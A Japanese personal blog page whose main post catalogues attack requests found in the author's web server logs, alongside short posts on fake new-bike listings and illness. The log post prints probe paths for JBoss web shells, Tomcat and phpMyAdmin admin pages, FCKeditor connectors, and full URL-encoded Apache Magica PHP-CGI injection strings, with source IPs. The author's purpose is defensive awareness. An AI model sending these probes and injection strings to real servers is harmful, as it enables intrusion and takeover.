新車新車詐欺?

テーマ:
新車ってうたってるけど新車じゃない詐欺業者が検索の邪魔!
というコメントを頂きました。
たしかにそういう業者もいそうですな。

でも一概に登録年数が低いから新車じゃないって言う対応も出来ないのですよ。

フルレストア車だから1980年のバイクだけど新車とか
登録しなおしてメーター0kmにして新車にしてるとか。。。


とりあえず改善策どうすっかなー。
なにかいい案があれば書き込んでくださいな。


AD
下記へのアクセス
/web-console/ServerInfo.jsp
アクセスがあったIPアドレス
103.24.206.93
111.74.239.46
114.66.217.38
199.101.117.169
202.109.143.81
202.109.143.95
58.218.207.170
67.198.174.130

これはおそらくJBOSSの脆弱性を突こうとしている。
ちなみにセキュリティホールの情報は2003年と非常に古い模様。
http://scan.netsecurity.ne.jp/article/2003/06/03/9927.html
http://scan.netsecurity.ne.jp/article/2003/06/04/9961.html
http://scan.netsecurity.ne.jp/article/2003/06/05/9980.html


下記へのアクセス
/administrator/index.php
アクセスがあったIPアドレス
109.209.182.79
125.27.11.200
125.27.8.205
176.212.204.23
192.198.95.56
213.123.215.170
77.120.96.66
94.175.225.226

おそらくjoomlaの管理画面にアクセスしようとしていると思われる。
セキュリティホールの情報は新しく、2013年ですねー。
http://jvndb.jvn.jp/ja/contents/2013/JVNDB-2013-001249.html


下記へのアクセス
/manager/html
アクセスがあったIPアドレス
111.74.122.19
112.91.243.148
121.78.147.55
200.158.223.137
218.57.203.100
221.208.168.183
222.178.68.11
222.186.24.141
60.214.128.37
61.160.213.120
61.161.164.77

非常に多い! これはtomcatの管理画面を見ようとしていると思われ
セキュリティホールではないけど、管理画面は見れないように設定しましょう。


下記へのアクセス
/FCKeditor/editor/fckeditor.Html
アクセスがあったIPアドレス
113.91.120.47
1.83.226.38
183.1.216.95
これはFCKeditorの脆弱性の、ディレクトリトラバーサルを狙ってきてるのかな?
http://jvndb.jvn.jp/ja/contents/2009/JVNDB-2009-001890.html
FCKeditor関連の不正アクセスはその他下記の通り
/fckeditor/editor/filemanager/browser/default/connectors/test.html
/fckeditor/editor/filemanager/connectors/test.html
/FCKeditor/editor/filemanager/connectors/uploadtest.html
/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
/components/FCKeditor/editor/filemanager/upload/php/upload.php
/FCKeditor/editor/fckeditor.html%E2%80%8E
/FCKeditor/editor/filemanager/browser/default/browser.html
/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
/fck/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
/fck/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

最近流行ってるようなので、FCKeditor使ってる人は気をつけて!


下記へのアクセス
/myadmin/scripts/setup.php
/pma/scripts/setup.php
アクセスが有ったIPアドレス
115.84.101.78
188.138.16.178

mysqlの管理インタフェースの脆弱性を狙った攻撃っぽいね。
http://d.hatena.ne.jp/snufkinski/20100206/1265434884
このurlとかが参考になるかも。


下記へのアクセス
/index.php/admin
アクセスがあったIPアドレス
188.94.230.146

こ、これはなんだ? よくわからないけどとりあえず不正アクセスですな。


下記へのアクセス
/img/lock.png
アクセスがあったIPアドレス
118.104.192.172

うーん、ロック画像を狙い撃ち?
このアクセスに何か意味がありそうには思えないんですが。。。


下記へのアクセス
//bynazi/cmd.jsp?comment=whoami
//CluJaNuL/cmd.jsp?cmd=whoami
//idssvc/idssvc.jsp?comment=whoami
//iesvc/iesvc.jsp?comment=whoami
//jmx-console/HtmlAdaptor
//wstats/wstats.jsp?comment=whoami
//zecmd/zecmd.jsp?comment=whoami
アクセスがあったIPアドレス
121.78.147.55

JBOSSのワームに感染してるかの検証のアクセスっぽいね。
たぶんこれが通ればファイルアップロードとかしてくるのかな。
下記参照
http://www.morihi-soc.net/?p=131


下記へのアクセス
/cgi-bin/php
/cgi-bin/php4
/cgi-bin/php5
/cgi-bin/php.cgi
/cgi-bin/php/cgin/php?%2D%64+%61%6C%75%6F%6E+%2D%64+%6D%6F%64+%2D%64+%73%75%68%6F%6E%3D%6F%6E+%2D%64+%75%6E%63%74%73%3D%22%22+%2D%64+%64%6E%65+%2D%64+%61%75%74%6F%5F%70%72%%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%74%5F%3D%30+%2D%64+%75%74+%2D%6E
/cgi-bin/php?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%6e
/cgi-bin/php/cgin/php?%2D%64+%61%6C%75%6F%6E+%2D%64+%6D%6F%64+%2D%64+%73%75%68%6F%6E%3D%6F%6E+%2D%64+%75%6E%63%74%73%3D%22%22+%2D%64+%64%6E%65+%2D%64+%61%75%74%6F%5F%70%72%%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%74%5F%3D%30+%2D%64+%75%74+%2D%6E
/cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E
アクセスが有ったIPアドレス
129.206.228.66
193.19.82.7
198.23.145.82
199.175.49.48
58.61.152.123
72.167.113.216
85.236.48.92

今流行のアパッチマギカアタック!
これでクラックされてるサイトいくつか見ましたが、今後も結構出てきそうです。
参考URL
http://blog.tokumaru.org/2013/11/apache-magica-attack.html

ちなみにphpを最新のバージョンに上げれば問題ないみたいなので
ちょっと前のバージョンとか使ってる人は要注意!

最悪サーバー乗っ取られちゃいますよ。


下記へのアクセス
/wp-content/thems/ほにゃらら/functions/upload-handler.php
アクセスがあったIPアドレス
151.236.51.86

ワードプレスのテーマ内にあるupload-handler.phpにクロスサイトリクエストフォージェリをしようとしてるんですかね。
http://osvdb.org/show/osvdb/99043
脆弱性もあるっぽいので、ワードプレス使ってる人は気をつけて!


下記へのアクセス
/user/soapCaller.bs
アクエスがあったIPアドレス
162.220.65.96

オープンソースCMSのDrupalの脆弱性を狙ってるっぽいね。
詳細はぐぐってもよくわからなかった。
セキュリティホールの情報も見つけられなかったけど、2010年だか2009年だかに修正パッチ出てるっぽい。
とどのつまりは最新版を使ってねってことですかね。


下記へのアクセス
/wp-content/plugins/auctionPlugin/uploadify/uploadify.css?
アクセスがあったIPアドレス
171.221.64.101

ワードプレスのjqueryへの不正アクセスかな?
cssがあるかどうかで、そのjqueryが存在するのかを見てるものと思われる。
その他にも下記のようなjqueryをさーちしてるアクセスも複数あり
/gallery/zp-core/admin-uploadify/uploadify.css?
/jquery.uploadify-v2.1.0/uploadify.css?
/jquery.uploadify-v2.1.4/uploadify.css?
/js/jquery.uploadify-v2.1.0/uploadify.css?
/js/jquery.uploadify-v2.1.4/uploadify.css?
/js/ofc/php-ofc-library/README.txt?
/js/php-ofc-library/README.txt?
/js/uploadify/uploadify.css?
/library/uploadify/uploadify.css?
/openemr/library/openflashchart/php-ofc-library/README.txt?
/podhawk/uploadify/uploadify.css?
/shop/lib/ofc/php-ofc-library/README.txt?
/splash/admin/uploadify/uploadify.css?
/wp-content/plugins/font-uploader/readme.txt?
/wp-content/plugins/complete-gallery-manager/readme.txt?
/wp-content/plugins/front-file-manager/readme.txt?
/wp-content/plugins/woopra/readme.txt?
/wp-content/plugins/wp-slimstat-ex/CHANGE.txt?
/wp-content/themes/clockstone/readme.txt?
/wp-content/plugins/front-end-upload/readme.txt?
/wp-content/plugins/uploader/uploadify/swfobject.js?
/wp-content/plugins/font-uploader/readme.txt?
/wp-content/plugins/ft-quicklogin/readme.txt?
/wp-content/plugins/uploader/uploadify/swfobject.js?
/wp-content/plugins/page-flip-image-gallery/js/editor_plugin.js
/wp-content/themes/kernel-theme/style.css
/wp-content/themes/OptimizePress/lib/admin/media-upload.php
171.221.64.101
95.211.197.1
172.246.127.26
182.151.130.169
205.234.162.198
212.90.148.37




おまけ
/female_models/7297/1/Zane%20Purina
/female_models/7298/1/Denise%20Schmitz
/female_models/7301/1/Tia%20Ward
/young_stars/6431/8/Laila%20Wan
/young_stars/7295/8/Fynlan%20Franks
/young_stars/7299/8/Charlotte%20O'Keefe

217.79.181.38

ググったらわかったけど、それうちのサイトじゃね~からwwwwww


結論
ワードプレスもjbossも、tomcatのadminも使ってないうちのサイトは意外と穴が少ないらしい。
コレを期にセキュリティの勉強でもしてみっかな。
AD
もうね、急性胃腸炎辛すぎwwww
水飲んだだけで吐くし、体だるいし。。。(´・ω・`)

嫁とうーうー唸ってます(;つД`)


あ、バイクサーチ新車検索できるようにしました。

といっても登録年数順にソートすると新車って出るだけですがw

うー、仕事つらーいしょぼん